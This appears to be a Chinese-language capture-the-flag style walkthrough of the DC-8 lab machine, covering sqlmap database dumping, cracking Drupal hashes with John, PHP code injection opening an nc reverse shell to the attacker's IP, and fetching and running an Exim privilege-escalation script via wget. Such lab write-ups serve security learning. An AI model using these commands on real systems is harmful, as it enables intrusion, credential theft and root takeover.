DC-8 靶机

DC_8

信息搜集

存活检测

DC-8 靶机_第1张图片

详细扫描

DC-8 靶机_第2张图片

后台网页扫描

DC-8 靶机_第3张图片

网站信息搜集

访问不同的页面的时候 url 随之变化

DC-8 靶机_第4张图片

尝试 sql 注入

在 url 后输入 ' 验证

直接报数据库语法错误

DC-8 靶机_第5张图片

漏洞利用

  • 使用 sqlmap 工具

  • 爆破数据库

    sqlmap -u 10.4.7.153/?nid=2 --dbs --batch
    

    DC-8 靶机_第6张图片

  • 成功爆破出两个数据库

    d7db 和 information_schema

    DC-8 靶机_第7张图片

  • 爆破数据库 d7db

    sqlmap -u 10.4.7.153/?nid=2 -D d7db -tables --batch
    

    DC-8 靶机_第8张图片

    爆破出 users 表

    DC-8 靶机_第9张图片

  • 爆破表中字段

    sqlmap -u 10.4.7.153/?nid=2 -D d7db -T users --dump
    

    DC-8 靶机_第10张图片

    爆破 admin 和 john 用户的密码

    $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
    
  • 写入 passwd 文件,使用 john 爆破

    DC-8 靶机_第11张图片

    爆破出一个密码 turtle

shell 获取

网页登录

  • 尝试 ssh、web 各种登录

  • 最终发现可以使用 john turtle 登录 扫描出来的 /user/login 界面

    DC-8 靶机_第12张图片

    DC-8 靶机_第13张图片

  • 网页信息搜集,最终在以下位置寻找到突破点

    DC-8 靶机_第14张图片

    DC-8 靶机_第15张图片

漏洞发现

  • 此处可以输出 php 代码

    DC-8 靶机_第16张图片

  • 尝试 phpinfo() 验证

    DC-8 靶机_第17张图片

    DC-8 靶机_第18张图片

    回到 view 页面,随便填写信息,点击提交

    DC-8 靶机_第19张图片

  • 未返回信息

    DC-8 靶机_第20张图片

  • 在 php 语句前随便加上一行

    DC-8 靶机_第21张图片

  • 成功执行

    DC-8 靶机_第22张图片

反弹 shell

  • kali 开启 nc 监听

    image-20231024201517645

  • 输入 php 连接命令

     system("nc -e /bin/bash 10.4.7.146 7777");?>
    

    DC-8 靶机_第23张图片

  • 保存并提交

    成功反弹

    DC-8 靶机_第24张图片

提权

  • 查看 suid 权限

    DC-8 靶机_第25张图片

    exim4 是 Linux 系统中的一个可执行文件,它是 Exim 邮件传输代理(MTA)的主要可执行文件。Exim 是一种广泛使用的邮件服务器软件,用于在 Linux 和类 Unix 系统上传输电子邮件。

  • 查看版本

    DC-8 靶机_第26张图片

  • 搜索漏洞

    searchsploit exim
    

    选择适合版本的本地提权脚本

    DC-8 靶机_第27张图片

  • 下载提权脚本

    DC-8 靶机_第28张图片

  • 将脚本转换为 uninx 格式

    apt install dos2unix
    dos2unix 46996.sh
    

    DC-8 靶机_第29张图片

    image-20231024211749430

  • 查看脚本使用方法

    DC-8 靶机_第30张图片

    无需修改

  • kali 开启 http 服务将提脚本上传至靶机

    python3 -m http.server 80
    

    DC-8 靶机_第31张图片

  • 靶机下载提权脚本

    wget http://10.4.7.146/46996.sh
    

    DC-8 靶机_第32张图片

  • 使用方法

    DC-8 靶机_第33张图片

  • 赋权,运行

    chmod 777 46996.sh
    ./46996.sh -m netcat
    

    DC-8 靶机_第34张图片

  • 提权成功

    DC-8 靶机_第35张图片

总结

  • sql 注入
  • 反弹 shell
  • 利用漏洞脚本时注意脚本对应的系统

你可能感兴趣的:(渗透测试,1024程序员节,网络安全,web安全,安全,服务器,运维)